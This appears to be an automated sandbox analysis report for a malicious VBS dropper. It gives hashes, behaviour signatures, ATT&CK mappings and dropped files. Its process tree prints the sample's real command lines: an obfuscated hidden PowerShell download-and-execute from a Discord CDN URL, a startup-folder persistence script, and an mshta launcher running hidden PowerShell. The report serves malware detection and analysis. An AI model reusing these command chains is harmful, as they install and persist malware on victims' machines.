Overview

overview

10

Static

static

e147c36f7e...ed.vbs

windows7_x64

8

e147c36f7e...ed.vbs

windows10_x64

10

Analysis

  • max time kernel
    17s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    15-09-2021 08:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs

  • Size

    828B

  • MD5

    9af0d5fbc14e3ac0ae409dfef6e04228

  • SHA1

    931b3139830e5485f198bb72ecba50475e4c8df2

  • SHA256

    e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed

  • SHA512

    fdca50df12edb4d7784a3c769908a695221456e8729b7ec61ec86b8328a18040c5aca7f2d6879f336b6c1a44b1323a8f1f05ff6dd14a4cbd9f233fedcd019f0e

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e147c36f7e37e928c129b2337c90bda770f4cd437899932c723fd9d5392859ed.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/876945743724822550/877222584595402823/Fucking.txt');$results
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:696
        • C:\Windows\System32\cmd.exe
          cmd /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:324
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of WriteProcessMemory
            PID:1456
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    715a8616bed900968c1073f51a046daa

    SHA1

    995665c72cfa9c88d8edab3e6212b17ac479aab8

    SHA256

    0d433c2cd57ed977bf3681c0b0eb87acf21a237647eee1afd741c008fe22740e

    SHA512

    8c99f8ba6b03e4bca03116132dd93bea84e8fd0e49a0f7b67d46533e0e735a0c3301bde4c18e6e45659e8fa3f68fcf12c78017d9740c5220d76bfe4b2908a8a1

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    614da39dd1b9bc0cad2bf9331f98340c

    SHA1

    72dd5336860a1a3e500f779f78a935d84970c14d

    SHA256

    266e4fb9d33676d994247bd0136bf588f7811cf2c325fa82fddbd77a6d8c7663

    SHA512

    e846c6a133551925df78c7029a9051f390736acc13ce75a7ab64e91e4283f785aa057af8427b1b0f01320685647bb3021d1bdc09ea6baa8d6d7bbb2a2c86196c

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
    MD5

    558a8b7b3fdef4ca79110f8cfd126694

    SHA1

    d6e96ca27f701b3f4c24885dacd14c762a9d36b0

    SHA256

    38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

    SHA512

    37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

    Download Submit
  • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
    MD5

    7f85382953fde20b101039d48673dbd2

    SHA1

    5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

    SHA256

    fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

    SHA512

    6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

    Download Submit
  • C:\Users\Public\myScript.ps1
    MD5

    317f5c7ef5b887966f963c21a60e2889

    SHA1

    5078bdb3e7376202c7253a8b428a360e1c047863

    SHA256

    cd7143c00ef7711ccdcc6877d6d393e4f6e2bb2aef26bf2214b81e660f7c7cdd

    SHA512

    e4d6590082671997ef08550d48b5ff43dd63a1811c4b883bbe75a9a5e22087b5928be43e624632bdaf8c01d4334ae397c672d1695900d1bd25e7a27a03b10750

    Download Submit
  • memory/324-76-0x0000000000000000-mapping.dmp
    Download
  • memory/696-72-0x0000000000000000-mapping.dmp
    Download
  • memory/1100-60-0x000007FEFBAA1000-0x000007FEFBAA3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1252-85-0x000000001AC34000-0x000000001AC36000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1252-78-0x0000000000000000-mapping.dmp
    Download
  • memory/1252-84-0x000000001AC30000-0x000000001AC32000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1252-91-0x0000000002520000-0x0000000002522000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1456-77-0x0000000000000000-mapping.dmp
    Download
  • memory/2020-66-0x0000000001E10000-0x0000000001E11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2020-71-0x000000001B610000-0x000000001B611000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2020-70-0x0000000001FE0000-0x0000000001FE2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2020-69-0x000000001B9E0000-0x000000001B9E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2020-68-0x0000000002974000-0x0000000002976000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2020-67-0x0000000001E40000-0x0000000001E41000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2020-61-0x0000000000000000-mapping.dmp
    Download
  • memory/2020-63-0x0000000002970000-0x0000000002972000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2020-65-0x000000001AD60000-0x000000001AD61000-memory.dmp
    Filesize

    4KB

    Download
  • memory/2020-64-0x0000000001CA0000-0x0000000001CA1000-memory.dmp
    Filesize

    4KB

    Download